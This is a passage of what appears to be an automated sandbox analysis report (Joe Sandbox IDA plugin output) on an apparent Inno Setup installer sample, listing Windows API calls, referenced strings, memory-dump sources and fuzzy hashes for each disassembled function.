                                                                                                                                        • Instruction ID: 3ed1135b8019c5f4588910a0035f5c9e1cabb82a18fedb82429c118dce795412
                                                                                                                                        • Opcode Fuzzy Hash: 99adc2ab1761f2fa15f1ac99c5dc87c93e60f5f8f6cafab150dd189b668492eb
                                                                                                                                        • Instruction Fuzzy Hash: 2911B430B00604AFDB02EFA6CD51A5EB7BDEB89705F5184B6FC44D3752DA389904CA24
                                                                                                                                        APIs
                                                                                                                                        • SendMessageA.USER32(00000000,00000B06,00000000,00000000), ref: 0045716E
                                                                                                                                        • SendMessageA.USER32(00000000,00000B00,00000000,00000000), ref: 0045720B
                                                                                                                                        Strings
                                                                                                                                        • Failed to create DebugClientWnd, xrefs: 004571D4
                                                                                                                                        • Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 0045719A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend
                                                                                                                                        • String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd
                                                                                                                                        • API String ID: 3850602802-3720027226
                                                                                                                                        • Opcode ID: 3689ec14d1edae2f57f0a744906126f7255bff4f1947e1d6bbead030c2853570
                                                                                                                                        • Instruction ID: a6ca84080c04e90ac639e3db27cd2c1e4b46fe4ea5f20cae781d9f83c3d7e460
                                                                                                                                        • Opcode Fuzzy Hash: 3689ec14d1edae2f57f0a744906126f7255bff4f1947e1d6bbead030c2853570
                                                                                                                                        • Instruction Fuzzy Hash: 1011E770248240AFD710AB69AC85B5FBBD89B54319F15407AFA849B383D7798C18C7AE
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                                                                        • GetFocus.USER32 ref: 00478757
                                                                                                                                        • GetKeyState.USER32(0000007A), ref: 00478769
                                                                                                                                        • WaitMessage.USER32(?,00000000,00478790,?,00000000,004787B7,?,?,00000001,00000000,?,?,?,00480402,00000000,004812C8), ref: 00478773
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FocusMessageStateTextWaitWindow
                                                                                                                                        • String ID: Wnd=$%x
                                                                                                                                        • API String ID: 1381870634-2927251529
                                                                                                                                        • Opcode ID: c0ca7a1e78f0957e158d44939737d51478939e9ac1b0c689120181bc9166dade
                                                                                                                                        • Instruction ID: f17a5035e7dee30901ec9a03c3a5a372f1d0714b29ccd98a4f066b2945bd060b
                                                                                                                                        • Opcode Fuzzy Hash: c0ca7a1e78f0957e158d44939737d51478939e9ac1b0c689120181bc9166dade
                                                                                                                                        • Instruction Fuzzy Hash: CE11C634A40244AFD704EF65DC49A9EBBF8EB49314F6184BFF409E7681DB386D00CA69
                                                                                                                                        APIs
                                                                                                                                        • FileTimeToLocalFileTime.KERNEL32(?), ref: 0046E618
                                                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 0046E627
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Time$File$LocalSystem
                                                                                                                                        • String ID: %.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u$(invalid)
                                                                                                                                        • API String ID: 1748579591-1013271723
                                                                                                                                        • Opcode ID: 93d3f9926fe1e9ec47fc0153e923e0389e011619b8f85a7a05f57e02ab74589b
                                                                                                                                        • Instruction ID: 5dd65cae4c1adac9d47cc9ad6336eda1851498fedff4a8a979bd050f9c4a6815
                                                                                                                                        • Opcode Fuzzy Hash: 93d3f9926fe1e9ec47fc0153e923e0389e011619b8f85a7a05f57e02ab74589b
                                                                                                                                        • Instruction Fuzzy Hash: A81136A440C3909ED340DF2AC04432BBAE4AB99704F44892EF8C8C6381E779C848DBB7
                                                                                                                                        APIs
                                                                                                                                        • SetFileAttributesA.KERNEL32(00000000,00000020), ref: 00453F83
                                                                                                                                          • Part of subcall function 00406F50: DeleteFileA.KERNEL32(00000000,0049B628,004986F1,00000000,00498746,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F5B
                                                                                                                                        • MoveFileA.KERNEL32(00000000,00000000), ref: 00453FA8
                                                                                                                                          • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$AttributesDeleteErrorLastMove
                                                                                                                                        • String ID: DeleteFile$MoveFile
                                                                                                                                        • API String ID: 3024442154-139070271
                                                                                                                                        • Opcode ID: ad4ba0b838e9d5317ad6887f6d8cb75152b6b17696a4ed4ee46c007163692804
                                                                                                                                        • Instruction ID: b5871bee3d194af1fa843ac656f6d820fc0ba16d57580c91db5694710367c43f
                                                                                                                                        • Opcode Fuzzy Hash: ad4ba0b838e9d5317ad6887f6d8cb75152b6b17696a4ed4ee46c007163692804
                                                                                                                                        • Instruction Fuzzy Hash: AEF062716142045BD701FBA2D84266EA7ECDB8435EF60443BB900BB6C3DA3C9E094529
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                                                        • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,004594A1,00000000,00459659,?,00000000,00000000,00000000), ref: 004593B1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseOpen
                                                                                                                                        • String ID: .NET Framework not found$InstallRoot$SOFTWARE\Microsoft\.NETFramework
                                                                                                                                        • API String ID: 47109696-2631785700
                                                                                                                                        • Opcode ID: be4fb59b900ee74e718d87cdc4fcd1eef43a9c564c0a5ec1af3f625bb6e6dd39
                                                                                                                                        • Instruction ID: 1950c6f853cc10ed35e504d9d8503a730f6ffd27dc9bba4e9fa27fab35675349
                                                                                                                                        • Opcode Fuzzy Hash: be4fb59b900ee74e718d87cdc4fcd1eef43a9c564c0a5ec1af3f625bb6e6dd39
                                                                                                                                        • Instruction Fuzzy Hash: 12F0AF31300110DBCB10EB9AD885B6F6299DB9931AF50503BF981DB293E73CCC168629
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00483C05
                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00483C28
                                                                                                                                        Strings
                                                                                                                                        • System\CurrentControlSet\Control\Windows, xrefs: 00483BD2
                                                                                                                                        • CSDVersion, xrefs: 00483BFC
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseOpenQueryValue
                                                                                                                                        • String ID: CSDVersion$System\CurrentControlSet\Control\Windows
                                                                                                                                        • API String ID: 3677997916-1910633163
                                                                                                                                        • Opcode ID: 33fca6af7241f4b653fe53c350a6e88c669f1de2ef3da1c7a1752152dae0c121
                                                                                                                                        • Instruction ID: 1d850e848a14c5c59b8e95f13e5f63a8fb365af486cc5d6c9f9b701d22fca986
                                                                                                                                        • Opcode Fuzzy Hash: 33fca6af7241f4b653fe53c350a6e88c669f1de2ef3da1c7a1752152dae0c121
                                                                                                                                        • Instruction Fuzzy Hash: 56F03176E40208A6DF10EAD48C45BAFB3BCAB14B05F104967EA10F7280E678AB048B59
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453B5A,00000000,00453BFD,?,?,00000000,00000000,00000000,00000000,00000000,?,00453FED,00000000), ref: 0042D90A
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D910
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                        • String ID: GetSystemWow64DirectoryA$kernel32.dll
                                                                                                                                        • API String ID: 1646373207-4063490227
                                                                                                                                        • Opcode ID: 3965e48138ab8598cb17ff311cd558fd433aca8a834515e354a81fb776e31baf
                                                                                                                                        • Instruction ID: 657275fb9dfacbe144619f02b172540cf2f0c5a6f4252bec6bd03a25d2dd35a2
                                                                                                                                        • Opcode Fuzzy Hash: 3965e48138ab8598cb17ff311cd558fd433aca8a834515e354a81fb776e31baf
                                                                                                                                        • Instruction Fuzzy Hash: A5E0DFE0B40B0122D70032BA1C82B6B108D4B84728F90053B3894E62D6DDBCD9840A6D
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,00000000,0042EAD0), ref: 0042EB62
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EB68
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                        • String ID: ShutdownBlockReasonDestroy$user32.dll
                                                                                                                                        • API String ID: 1646373207-260599015
                                                                                                                                        • Opcode ID: 88ce12e330a2fc51ece58c284b54de3a76b504cb94a4c995bd1a3fb2c6ea0693
                                                                                                                                        • Instruction ID: e1ec077e445c8734ae54db5ffdd633522f5c412f0b7fee52e54de0d29bb4c321
                                                                                                                                        • Opcode Fuzzy Hash: 88ce12e330a2fc51ece58c284b54de3a76b504cb94a4c995bd1a3fb2c6ea0693
                                                                                                                                        • Instruction Fuzzy Hash: A2D0C793311732665D10B1F73CD1EAB058C891527935404B7F515E5641D55DEC1115AD
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,00498BF2), ref: 0044F77F
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F785
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                        • String ID: NotifyWinEvent$user32.dll
                                                                                                                                        • API String ID: 1646373207-597752486
                                                                                                                                        • Opcode ID: f97c3de5cacafbf63d36e16939e29d51eb7e912e87a0fb2b79f6fc39cd446e20
                                                                                                                                        • Instruction ID: 5e946f17392c81a4f172a46fe169fb9a1f72c9003761a5edf28bd31acc2f1150
                                                                                                                                        • Opcode Fuzzy Hash: f97c3de5cacafbf63d36e16939e29d51eb7e912e87a0fb2b79f6fc39cd446e20
                                                                                                                                        • Instruction Fuzzy Hash: 59E012F0E417049AFF00BBB57B86B1A3A90E764719B00057FF414A6292DB7C481C4F9D
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498C48,00000001,00000000,00498C6C), ref: 00498972
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00498978
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                        • String ID: DisableProcessWindowsGhosting$user32.dll
                                                                                                                                        • API String ID: 1646373207-834958232
                                                                                                                                        • Opcode ID: 71af8591fbce5d4533a7188bae6238bebf63b2f5996384562a89c67780edd1c3
                                                                                                                                        • Instruction ID: 34f838485a85c0df890c3e192e44216071158a5cea444d63bbc0a0b2480586ef
                                                                                                                                        • Opcode Fuzzy Hash: 71af8591fbce5d4533a7188bae6238bebf63b2f5996384562a89c67780edd1c3
                                                                                                                                        • Instruction Fuzzy Hash: 22B002C0651707589D5032FA0D06B3F48484C5276D728057F3414A51C6DD6C89115D3F
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0044B658: LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F775,00498BF2), ref: 0044B67F
                                                                                                                                          • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B697
                                                                                                                                          • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6A9
                                                                                                                                          • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6BB
                                                                                                                                          • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6CD
                                                                                                                                          • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6DF
                                                                                                                                          • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6F1
                                                                                                                                          • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B703
                                                                                                                                          • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B715
                                                                                                                                          • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B727
                                                                                                                                          • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B739
                                                                                                                                          • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B74B
                                                                                                                                          • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B75D
                                                                                                                                          • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B76F
                                                                                                                                          • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B781
                                                                                                                                          • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B793
                                                                                                                                          • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B7A5
                                                                                                                                          • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7B7
                                                                                                                                        • LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,00498C1A), ref: 00464603
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464609
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$LibraryLoad
                                                                                                                                        • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                                                                                        • API String ID: 2238633743-2683653824
                                                                                                                                        • Opcode ID: edc6f8ec64a36a5908760ff58e990ea99ea877eb638915fc896b3384d426fa6b
                                                                                                                                        • Instruction ID: ed4894befccbfeda2ad80f7d1b9e1cb4df1a551eae9986247d0c145e26b1cd95
                                                                                                                                        • Opcode Fuzzy Hash: edc6f8ec64a36a5908760ff58e990ea99ea877eb638915fc896b3384d426fa6b
                                                                                                                                        • Instruction Fuzzy Hash: DDB092D0A82740A4C90077F2985B90F2A4488A271EB10153B710476483EABC84100EAE
                                                                                                                                        APIs
                                                                                                                                        • FindNextFileA.KERNEL32(000000FF,?,00000000,0047D7F0,?,?,?,?,00000000,0047D945,?,?,?,00000000,?,0047DA54), ref: 0047D7CC
                                                                                                                                        • FindClose.KERNEL32(000000FF,0047D7F7,0047D7F0,?,?,?,?,00000000,0047D945,?,?,?,00000000,?,0047DA54,00000000), ref: 0047D7EA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Find$CloseFileNext
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2066263336-0
                                                                                                                                        • Opcode ID: df8c12b404288ac1cc0f16a4307cfa19f630790b74cd409a531bdd723e619500
                                                                                                                                        • Instruction ID: 2ce97de6e4eb512f8d4c2eb376340b964b0e691095a652a34be041e4083b4e02
                                                                                                                                        • Opcode Fuzzy Hash: df8c12b404288ac1cc0f16a4307cfa19f630790b74cd409a531bdd723e619500
                                                                                                                                        • Instruction Fuzzy Hash: 07813A74D0024D9FCF11EFA5CC91ADFBBB8EF49304F5080AAE908A7291D6399A46CF54
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0042EE30: GetTickCount.KERNEL32 ref: 0042EE36
                                                                                                                                          • Part of subcall function 0042EC88: MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0042ECBD
                                                                                                                                        • GetLastError.KERNEL32(00000000,00475721,?,?,0049C1E0,00000000), ref: 0047560A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CountErrorFileLastMoveTick
                                                                                                                                        • String ID: $LoggedMsgBox returned an unexpected value. Assuming Cancel.$MoveFileEx
                                                                                                                                        • API String ID: 2406187244-2685451598
                                                                                                                                        • Opcode ID: b4e541c37b522712e9a51433fba2d6f7c47cca6c6c5b44fd3a0118cd85a505a9
                                                                                                                                        • Instruction ID: cfe7f312216358cbd0971b398f0cafde252de4893b1317a5ce8d70824cf78b76
                                                                                                                                        • Opcode Fuzzy Hash: b4e541c37b522712e9a51433fba2d6f7c47cca6c6c5b44fd3a0118cd85a505a9
                                                                                                                                        • Instruction Fuzzy Hash: 4D418570A006099BDB10EFA5D882AEF77B5FF48314F508537E408BB395D7789A058BA9
                                                                                                                                        APIs
                                                                                                                                        • GetDesktopWindow.USER32 ref: 00413D46
                                                                                                                                        • GetDesktopWindow.USER32 ref: 00413DFE
                                                                                                                                          • Part of subcall function 00418EC0: 6FDEC6F0.COMCTL32(?,00000000,00413FC3,00000000,004140D3,?,?,0049B628), ref: 00418EDC
                                                                                                                                          • Part of subcall function 00418EC0: ShowCursor.USER32(00000001,?,00000000,00413FC3,00000000,004140D3,?,?,0049B628), ref: 00418EF9
                                                                                                                                        • SetCursor.USER32(00000000,?,?,?,?,00413AF3,00000000,00413B06), ref: 00413E3C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
